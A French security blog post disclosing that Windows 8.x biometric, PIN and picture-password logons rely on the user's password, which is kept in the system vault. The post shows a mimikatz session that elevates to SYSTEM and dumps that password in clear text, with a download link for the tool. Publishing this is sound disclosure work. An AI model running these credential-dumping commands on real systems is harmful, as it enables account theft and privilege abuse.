Windows 8, empreintes digitales

windows_fingerprints

Dans un post précédent j’abordais deux méthodes d’authentifications alternatives au mot de passe historique sous Windows 8.x ; le code pin ou l’image.

Mais Windows 8.x supporte maintenant nativement l’authentification biométrique, par exemple par empreinte digitale (http://technet.microsoft.com/library/dn344916.aspx).

logon_fingerprints

Windows n’implémente pas une réelle architecture d’authentification biométrique, il vérifie dans une base interne que l’empreinte figure bien dans son référentiel et… retourne le mot de passe utilisateur en clair…

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 23 2014 00:52:44)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  14 modules * * */


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : AUTORITE NT\Système

408     34205           AUTORITE NT\Système     S-1-5-18        (04g,20p)       Primary
 -> Impersonated !
 * Process Token : 1347551      win81\Utilisateur       S-1-5-21-650724876-2192615621-2148298248-1001   (14g,23p)       Primary
 * Thread Token  : 1354005      AUTORITE NT\Système     S-1-5-18        (04g,20p)       Impersonation (Delegation)

mimikatz # vault::list

Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
        Name       : Informations d’identification Web
        Path       : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        Items (3)
          0.    PIN Logon Credential
                Type            : {b2e033f5-5fde-450d-a1bd-3791f465720c}
                LastWritten     : 23/01/2014 22:39:26
                Flags           : 00000000
                Ressource       : PIN Logon Vault Resource
                Identity        : 01 05 00 00 00 00 00 05 15 00 00 00 0c 46 c9 26 c5 a8 b0 82 08 6e 0c 80 e9 03 00 00
                Authenticator   :
                PackageSid      :
                Property  0     : 1234
                *Authenticator* : 77 00 61 00 7a 00 61 00 31 00 32 00 33 00 34 00 2f 00 00 00

                *** Pin Logon ***
                User            : win81\Utilisateur
                Password        : waza1234/
                PIN Code        : 1234

          1.    WinBio CredProv Credential
                Type            : {fec87291-14f6-40b6-bd98-7ff245986b26}
                LastWritten     : 22/01/2014 23:53:14
                Flags           : 00000000
                Ressource       : WinBio CredProv Resource
                Identity        : 01 05 00 00 00 00 00 05 15 00 00 00 0c 46 c9 26 c5 a8 b0 82 08 6e 0c 80 e9 03 00 00
                Authenticator   :
                PackageSid      :
                Property  0     : 0c 00 00 00 0c 00 00 00 06 00 00 00 55 00 74 00 69 00 6c 00 69 00 73 00 61 00 74 00 65 00 75 00 72 00 00 00 77 00 69 00 6e 00 38 00 31 00 00 00
                *Authenticator* : 77 00 61 00 7a 00 61 00 31 00 32 00 33 00 34 00 2f 00 00 00

                *** Biometric ***
                User            : win81\Utilisateur
                Password        : waza1234/
                Username [ 6]   : Utilisateur

          2.    Picture Password Credential
                Type            : {b4b8a12b-183d-4908-9559-bd8bce72b58a}
                LastWritten     : 22/01/2014 22:34:16
                Flags           : 00000000
                Ressource       : Picture Password Vault Resource
                Identity        : 01 05 00 00 00 00 00 05 15 00 00 00 0c 46 c9 26 c5 a8 b0 82 08 6e 0c 80 e9 03 00 00
                Authenticator   :
                PackageSid      :
                Property  0     : 02 00 00 00 56 00 00 00 39 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00
                *Authenticator* : 77 00 61 00 7a 00 61 00 31 00 32 00 33 00 34 00 2f 00 00 00

                *** Picture Password ***
                User            : win81\Utilisateur
                Password        : waza1234/
                Background path : C:\ProgramData\Microsoft\Windows\SystemData\S-1-5-21-650724876-2192615621-2148298248-1001\ReadOnly\PicturePassword\background.png
                Picture password (grid is 150*100)
                 [0] circle (x =  86 ; y =  57 ; r =   8) - anticlockwise
                 [1] point  (x =  47 ; y =  46)
                 [2] point  (x = 125 ; y =  46)

Le mot de passe utilisateur est, une fois de plus, stocké dans le coffre du système…

Téléchargement

La version alpha prenant en charge ces améliorations est disponible : http://blog.gentilkiwi.com/mimikatz

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.